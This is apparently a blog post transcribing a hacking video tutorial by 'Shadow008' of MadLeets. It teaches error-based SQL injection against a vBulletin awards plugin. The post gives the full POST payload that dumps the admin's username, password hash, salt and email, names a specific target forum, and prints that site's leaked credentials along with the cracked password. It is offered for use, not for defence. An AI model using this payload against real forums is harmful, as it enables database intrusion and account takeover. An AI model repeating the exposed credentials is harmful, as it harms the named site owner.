What things I used?
1) FireFox
2) Hackbar addon
3) PasswordsPro for Cracking
vBulletin Hash Type:md5(md5($salt).md5($pass))
Text In Video:
Code:
# Assalamu Alaikum and HellO EveryOne !# In this video, I will be teaching you guys on how to SQL Inject into a vBulletin database from a vulnerable plugin called Yet Another Awards System.# Many websites are using it, It will work on some sites.
# Lets Start :D# Target: http://fpsbunker.com/fodforums/# Vul Link: http://fpsbunker.com/fodforums/request_award.php# Click Load URLAnd Then Post:Post: do=submit&name=award_id=2 &award_request_reason=0&award_request_uid=0' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt,0x3a,email) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#&submit=Submit# and then hit Execute :DDatabase Error, Check its page source code
MySQL Error : Duplicate entry 'day8249:cf9fc99e21a3bce77358713ffa0cb59c:P@H:ryan@fpsbunker.com~' for key 'group_key'# Username:day8249# Hash:cf9fc99e21a3bce77358713ffa0cb59c# Salt:P@H# Email:ryan@fpsbunker.com
Lets Crack the admin Hash :D
# Cracked Password:ryan03Admin password cracked and is ryan03Lets try
# Thanks for watching and I hope the video was easy to understand.# More video tutorials can be found at www.MadLeets.com# Video By Shadow008# Greets to All MadLeeTs Team: www.MadLeets.com
0 yorum:
Yorum Gönder